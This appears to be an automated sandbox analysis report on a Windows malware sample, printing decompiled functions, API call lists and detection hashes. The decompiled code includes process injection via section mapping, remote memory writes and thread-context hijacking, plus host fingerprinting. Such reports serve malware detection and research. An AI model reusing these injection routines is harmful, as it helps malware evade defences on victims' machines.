445e6b1 15243->15244 15245 4458ddf 2 API calls 15244->15245 15246 445e6bc 15245->15246 15247 4458ddf 2 API calls 15246->15247 15247->15228 15248 445e5ed 15248->15241 15249 445e684 lstrlenW 15248->15249 15249->15248 15250->15227 15252 445a617 15251->15252 15253 4458e5d 3 API calls 15252->15253 15255 445a717 15252->15255 15258 445a692 15252->15258 15253->15258 15254 445a6ef 15254->15255 15256 4458f63 memset 15254->15256 15255->15233 15256->15255 15257 4458ecb lstrlenW 15257->15258 15258->15254 15258->15257 15260 4459f85 2 API calls 15259->15260 15261 445e3c7 15260->15261 15262 4459eab 4 API calls 15261->15262 15263 445e3d1 15262->15263 15264 4458d9a 2 API calls 15263->15264 15265 445e3dc 15264->15265 15265->15240 15267 4459c50 2 API calls 15266->15267 15268 445e412 CoInitializeEx 15267->15268 15269 4459f85 2 API calls 15268->15269 15270 445e42d 15269->15270 15271 4459f85 2 API calls 15270->15271 15272 445e43e 15271->15272 15273 4458d9a 2 API calls 15272->15273 15274 445e45a 15273->15274 15275 4458d9a 2 API calls 15274->15275 15276 445e470 15275->15276 15277 4458ddf 2 API calls 15276->15277 15278 445e47b 15277->15278 15278->15248 13506 4451e2a 13507 4451e47 13506->13507 13508 4451e42 13506->13508 13520 4459ca5 13507->13520 13510 4458ddf 2 API calls 13508->13510 13512 4451ea0 13510->13512 13513 4459e22 2 API calls 13512->13513 13515 4451eac 13513->13515 13514 4459b26 2 API calls 13516 4451e63 13514->13516 13516->13508 13517 445b787 2 API calls 13516->13517 13518 4451e78 13517->13518 13519 4458ddf 2 API calls 13518->13519 13519->13508 13523 4459cbc 13520->13523 13522 4451e50 13522->13508 13522->13514 13527 4458dc9 RtlAllocateHeap 13523->13527 13524 4459cfd lstrcatA 13525 4459d11 lstrcatA 13524->13525 13526 4459cf2 13524->13526 13525->13526 13526->13522 13526->13524 13527->13526 12971 4456438 12972 4456448 ExitProcess 12971->12972

            Executed Functions

            Function 0445D538 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 223nativeregistrymemoryCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 95%
            			E0445D538(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				void* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				short _t98;
				intOrPtr _t105;
				long _t107;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				void* _t138;
				void* _t147;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t158;
				void* _t163;
				void* _t165;

				_t81 =  *0x446f8d4; // 0x450fc00
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E0445F15B(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x446f9d0; // 0x450fa00
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x446f8d0; // 0x450f8c0
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
					}
					if(_v20 != 0) {
						NtClose(_v20);
					}
					return _v8;
				}
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x446ce70; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t105 =  *0x446f8d0; // 0x450f8c0
				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
				_t158 = _v12;
				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
					goto L15;
				} else {
					_t154 = E04458E2E( *0x446f8d4, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E04458DDF( &_v36, 0x1ac4);
					_t119 =  *0x446f8d4; // 0x450fc00
					_t155 =  *0x446f8e8; // 0x4450000
					_v36 = _t119;
					 *0x446f8e8 = _v8;
					 *0x446f8d4 = _t163;
					E04458EA6(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E0445D4B7(_v16, _v8, _v44);
					_t124 = E0445A5D0("Jjischug");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 = _t138 + 1;
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x446f8e8 = _t155;
						 *0x446f8d4 = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}






































            0x0445d53e
            0x0445d544
            0x0445d546
            0x0445d54a
            0x0445d54c
            0x0445d54f
            0x0445d552
            0x0445d555
            0x0445d558
            0x0445d55b
            0x0445d566
            0x0445d569
            0x0445d570
            0x0445d570
            0x0445d575
            0x0445d578
            0x0445d57a
            0x0445d57d
            0x0445d586
            0x0445d77f
            0x0445d77f
            0x0445d782
            0x0445d785
            0x0445d78a
            0x0445d790
            0x0445d793
            0x0445d793
            0x0445d796
            0x0445d79a
            0x0445d79c
            0x0445d7b1
            0x0445d7b1
            0x0445d7bb
            0x0445d7c5
            0x0445d7c5
            0x0445d7cc
            0x0445d7cc
            0x0445d595
            0x0445d5af
            0x00000000
            0x00000000
            0x0445d5b5
            0x0445d5bd
            0x0445d5c5
            0x0445d5cb
            0x0445d5d2
            0x0445d5da
            0x0445d5db
            0x0445d5e2
            0x0445d5e5
            0x0445d5e6
            0x0445d5ed
            0x0445d5f0
            0x0445d5f7
            0x0445d5f8
            0x0445d5fb
            0x0445d607
            0x0445d629
            0x0445d631
            0x0445d634
            0x0445d63f
            0x0445d63f
            0x0445d631
            0x0445d65b
            0x0445d66a
            0x0445d66d
            0x0445d672
            0x00000000
            0x0445d69c
            0x0445d6ac
            0x0445d6ae
            0x0445d6b5
            0x00000000
            0x00000000
            0x0445d6ca
            0x0445d6dd
            0x0445d6f1
            0x0445d6fd
            0x0445d702
            0x0445d707
            0x0445d70d
            0x0445d713
            0x0445d71b
            0x0445d72b
            0x0445d737
            0x0445d741
            0x0445d749
            0x0445d74e
            0x0445d751
            0x0445d759
            0x0445d759
            0x0445d759
            0x0445d75c
            0x0445d760
            0x0445d761
            0x0445d765
            0x0445d769
            0x0445d772
            0x0445d778
            0x00000000
            0x0445d778
            0x0445d753
            0x0445d757
            0x00000000
            0x00000000
            0x00000000
            0x0445d757

            APIs
            • NtCreateSection.NTDLL(0445DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0445D5AA
            • RegisterClassExA.USER32(?), ref: 0445D5FE
            • CreateWindowExA.USER32 ref: 0445D629
            • DestroyWindow.USER32(00000000), ref: 0445D634
            • UnregisterClassA.USER32 ref: 0445D63F
            • NtMapViewOfSection.NTDLL(0445DA07,00000000), ref: 0445D66A
            • NtMapViewOfSection.NTDLL(0445DA07,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0445D691
            • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 0445D6D7
            • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 0445D6F1
              • Part of subcall function 04458DDF: HeapFree.KERNEL32(00000000,00000000), ref: 04458E25
            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,04456297), ref: 0445D769
            • NtUnmapViewOfSection.NTDLL(00000000), ref: 0445D7B1
            • NtClose.NTDLL(00000000), ref: 0445D7C5
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
            • String ID: 0$18293$Jjischug$aeroflot
            • API String ID: 494031690-3772587274
            • Opcode ID: c3b94c7bb17a5d23f20207a56f288ea514daba769a68b28326ad7d13574b505c
            • Instruction ID: ee53e06438784baf6fb0a029e7303562a81c3fa22c76b59882adc454ba402b36
            • Opcode Fuzzy Hash: c3b94c7bb17a5d23f20207a56f288ea514daba769a68b28326ad7d13574b505c
            • Instruction Fuzzy Hash: 5881F5B5E00219EFEF10DF95E884AEEBBB8FF08704F14406AE945A7261D774AD04CB65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445D9DE Relevance: 6.1, APIs: 4, Instructions: 89nativethreadCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 143 445d9de-445d9f7 call 445d309 146 445dad0-445dadb call 445d47c 143->146 147 445d9fd-445da0b call 445d538 143->147 147->146 152 445da11-445da48 call 4458f63 GetThreadContext 147->152 152->146 155 445da4e-445da8e NtProtectVirtualMemory 152->155 156 445da90-445daab NtWriteVirtualMemory 155->156 157 445dace 155->157 156->157 158 445daad-445dacc NtProtectVirtualMemory 156->158 157->146 158->146 158->157
            C-Code - Quality: 100%
            			E0445D9DE(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t57;
				long _t59;
				void* _t62;
				void** _t65;
				void* _t66;

				_t65 = __edx;
				_t57 = __ecx;
				_t66 = 0;
				if(E0445D309(__ecx, __edx, __edx, 0) != 0) {
					_t33 = E0445D538( *((intOrPtr*)(__edx)), _a4); // executed
					_t66 = _t33;
					if(_t66 != 0) {
						E04458F63( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t65[1],  &_v744) != 0) {
							_t62 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t59 = 5;
							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
							_v8 = _t59;
							_v16 = _t62;
							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
								L6:
								_t66 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				E0445D47C();
				return _t66;
			}



















            0x0445d9ea
            0x0445d9ec
            0x0445d9ee
            0x0445d9f7
            0x0445da02
            0x0445da07
            0x0445da0b
            0x0445da1f
            0x0445da27
            0x0445da48
            0x0445da4e
            0x0445da56
            0x0445da64
            0x0445da6a
            0x0445da6b
            0x0445da77
            0x0445da7e
            0x0445da8e
            0x0445dace
            0x0445dace
            0x0445daad
            0x0445daad
            0x0445dacc
            0x00000000
            0x00000000
            0x0445dacc
            0x0445da8e
            0x0445da48
            0x0445da0b
            0x0445dad0
            0x0445dadb

            APIs
              • Part of subcall function 0445D309: LoadLibraryW.KERNEL32 ref: 0445D403
              • Part of subcall function 0445D538: NtCreateSection.NTDLL(0445DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0445D5AA
              • Part of subcall function 0445D538: RegisterClassExA.USER32(?), ref: 0445D5FE
              • Part of subcall function 0445D538: CreateWindowExA.USER32 ref: 0445D629
              • Part of subcall function 0445D538: DestroyWindow.USER32(00000000), ref: 0445D634
              • Part of subcall function 0445D538: UnregisterClassA.USER32 ref: 0445D63F
              • Part of subcall function 04458F63: memset.MSVCRT ref: 04458F75
            • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0445DA40
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0445DA89
            • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0445DAA6
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0445DAC7
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
            • String ID:
            • API String ID: 1578692462-0
            • Opcode ID: a60e76562fac9f42f4ea54f85519c91da7d9e04721cc24148dd3494585f087ec
            • Instruction ID: 2be7cc27c53be5091b5556af9bc4979ed54cad9c5cb451e19ee99af6b293b3ab
            • Opcode Fuzzy Hash: a60e76562fac9f42f4ea54f85519c91da7d9e04721cc24148dd3494585f087ec
            • Instruction Fuzzy Hash: 3E312FB2A00109AFEF11DFA5D944FDEB7B8EF48214F1441A6E905E2261D770EE44CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445DFC2 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 250COMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 79%
            			E0445DFC2(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x446f8e8; // 0x4450000
				_t68 = E04458DC9(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x446f8d0; // 0x450f8c0
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E044635A9( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x446f8d0; // 0x450f8c0
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E044597E9(_t194, _t207);
					}
					_t75 =  *0x446f8d0; // 0x450f8c0
					_t77 = E0445CA0A( *((intOrPtr*)(_t75 + 0x12c))()); // executed
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E0445CB85( *_t77) == 0) {
						_t79 = E0445CA5A(_t159, _t194); // executed
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220, executed
					_t80 = E0445F3A0(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
					_t81 = E0445F365(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x446f8d8; // 0x450fab0
					_push(0); // executed
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t90 = GetSystemMetrics(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E0445DFBB(_t149); // executed
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E044597E9(_t149, _t211);
					}
					_t92 = E0445C85A();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E0445C64D(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E04459BD5(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E04459803(_t149, _t36);
					_t97 = E0445E34A(_t196, E0445A5D0(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E0445C870(_t97, _t37, _t216);
					_t99 =  *0x446f8d0; // 0x450f8c0
					_t101 = E0445CBD7( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
					E04458F63(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E0445DDBE(_t100);
					_t106 = E0445DDE7(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E04459F85(_t105, 0xf73);
					_t177 =  *0x446f8d0; // 0x450f8c0
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x446f8d0; // 0x450f8c0
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E04458D9A( &_v8);
					_t113 =  *0x446f8d0; // 0x450f8c0
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E04459FE4(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x446f8d0; // 0x450f8c0
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x446f8d0; // 0x450f8c0
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x446f8d0; // 0x450f8c0
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x446f8d0; // 0x450f8c0
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x446f8d0; // 0x450f8c0
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x446f8d0; // 0x450f8c0
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E044635A9(E0445E34A(_t62, E0445A5D0(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E0446357B( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E044598D0(_t66, _t191);
					_t134 = E0445DB68(_t191); // executed
					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
					return _t192;
				}
				return _t68;
			}























































            0x0445dfc2
            0x0445dfcc
            0x0445dfd8
            0x0445dfdd
            0x0445dfe2
            0x0445dfef
            0x0445dff5
            0x0445dffa
            0x0445e000
            0x0445e010
            0x0445e015
            0x0445e01a
            0x0445e01a
            0x0445e02a
            0x0445e030
            0x0445e032
            0x0445e03b
            0x0445e03b
            0x0445e041
            0x0445e04e
            0x0445e053
            0x0445e059
            0x0445e062
            0x0445e070
            0x0445e077
            0x0445e07c
            0x0445e07c
            0x0445e07d
            0x0445e064
            0x0445e064
            0x0445e064
            0x0445e083
            0x0445e089
            0x0445e08e
            0x0445e094
            0x0445e099
            0x0445e09f
            0x0445e09f
            0x0445e0a8
            0x0445e0ae
            0x0445e0b2
            0x0445e0b9
            0x0445e0c0
            0x0445e0c7
            0x0445e0cb
            0x0445e0d2
            0x0445e0d3
            0x0445e0d5
            0x0445e0da
            0x0445e0e1
            0x0445e0e3
            0x0445e0e3
            0x0445e0f3
            0x0445e0f8
            0x0445e0f8
            0x0445e105
            0x0445e10b
            0x0445e110
            0x0445e112
            0x0445e11b
            0x0445e11b
            0x0445e123
            0x0445e128
            0x0445e128
            0x0445e12e
            0x0445e139
            0x0445e13e
            0x0445e146
            0x0445e14c
            0x0445e154
            0x0445e166
            0x0445e16c
            0x0445e174
            0x0445e179
            0x0445e186
            0x0445e197
            0x0445e19d
            0x0445e1a2
            0x0445e1a5
            0x0445e1a8
            0x0445e1b5
            0x0445e1bb
            0x0445e1c5
            0x0445e1c5
            0x0445e1cb
            0x0445e1d3
            0x0445e1de
            0x0445e1e3
            0x0445e1e9
            0x0445e1eb
            0x0445e1f8
            0x0445e1f9
            0x0445e1fa
            0x0445e205
            0x0445e207
            0x0445e20e
            0x0445e20e
            0x0445e218
            0x0445e21d
            0x0445e222
            0x0445e222
            0x0445e228
            0x0445e22f
            0x0445e230
            0x0445e23d
            0x0445e250
            0x0445e255
            0x0445e25a
            0x0445e263
            0x0445e263
            0x0445e269
            0x0445e26e
            0x0445e274
            0x0445e27a
            0x0445e27f
            0x0445e288
            0x0445e28a
            0x0445e291
            0x0445e291
            0x0445e297
            0x0445e29f
            0x0445e2a4
            0x0445e2a5
            0x0445e2aa
            0x0445e2b3
            0x0445e2b5
            0x0445e2c0
            0x0445e2c0
            0x0445e2c9
            0x0445e2d1
            0x0445e2d8
            0x0445e2dd
            0x0445e2ec
            0x0445e304
            0x0445e30b
            0x0445e319
            0x0445e324
            0x0445e325
            0x0445e329
            0x0445e32f
            0x0445e330
            0x0445e338
            0x0445e33d
            0x00000000
            0x0445e345
            0x0445e349

            APIs
              • Part of subcall function 04458DC9: RtlAllocateHeap.NTDLL(00000008,?,?,04459793,00000100,?,0445661B), ref: 04458DD7
            • GetCurrentProcessId.KERNEL32 ref: 0445DFE9
            • GetLastError.KERNEL32 ref: 0445E0E3
            • GetSystemMetrics.USER32(00001000), ref: 0445E0F3
            • GetVersionExA.KERNEL32(00000000), ref: 0445E1A8
              • Part of subcall function 0445CA5A: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04450000), ref: 0445CAFE
            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0445E1D3
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
            • API String ID: 3131805607-2706916422
            • Opcode ID: bfa26404196f00dd73f7fe620bd9f17655b2d7e1f9d3e2359141ff7911387bbb
            • Instruction ID: 29c8acd0b9b1a1c23712cd1f4a7e5bce989813c53d5eb7fa45cbf99f5c1e31db
            • Opcode Fuzzy Hash: bfa26404196f00dd73f7fe620bd9f17655b2d7e1f9d3e2359141ff7911387bbb
            • Instruction Fuzzy Hash: 4E914C71700605EFEF04EB75D888FEAB7A8FF08704F14416AE94A97252DB74BA448B91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445C778 Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 94%
            			E0445C778(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E04458F63(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x446f8d0; // 0x450f8c0
				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E04459F85(_t44, 0x978);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E04458D9A( &_v16);
				_t33 = E0445A5E9(_t43);
				E04459FE4( &(_t43[E0445A5E9(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0445A5E9(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0445E34A(_t43, E0445A5E9(_t43) + _t40, 0);
			}
















            0x0445c778
            0x0445c781
            0x0445c78d
            0x0445c793
            0x0445c795
            0x0445c79d
            0x0445c7ab
            0x0445c7b0
            0x0445c7bf
            0x0445c7ca
            0x0445c7d7
            0x0445c7f1
            0x0445c7f6
            0x0445c7f8
            0x0445c7ff
            0x0445c80f
            0x0445c820
            0x0445c82a
            0x0445c832
            0x0445c839
            0x0445c83c
            0x0445c859

            APIs
              • Part of subcall function 04458F63: memset.MSVCRT ref: 04458F75
            • lstrcpynW.KERNEL32(?,?,00000100), ref: 0445C7BF
            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0445C7F1
              • Part of subcall function 04459FE4: _vsnwprintf.MSVCRT ref: 0445A001
            • lstrcatW.KERNEL32(?,00000114), ref: 0445C82A
            • CharUpperBuffW.USER32(?,00000000), ref: 0445C83C
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
            • String ID:
            • API String ID: 455400327-0
            • Opcode ID: 462a91643f865a36c985e61792070f7553c3b61232789bd4fcb3b7dd349ae443
            • Instruction ID: 59e9935f1082f1835bad7df959a205203d206f7822570a95f0112872fc120df2
            • Opcode Fuzzy Hash: 462a91643f865a36c985e61792070f7553c3b61232789bd4fcb3b7dd349ae443
            • Instruction Fuzzy Hash: D22149B2A00218FFFF14ABA5DC49FAE77BCDF84214F1041AAF505D2152EA746E048B61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445EF38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
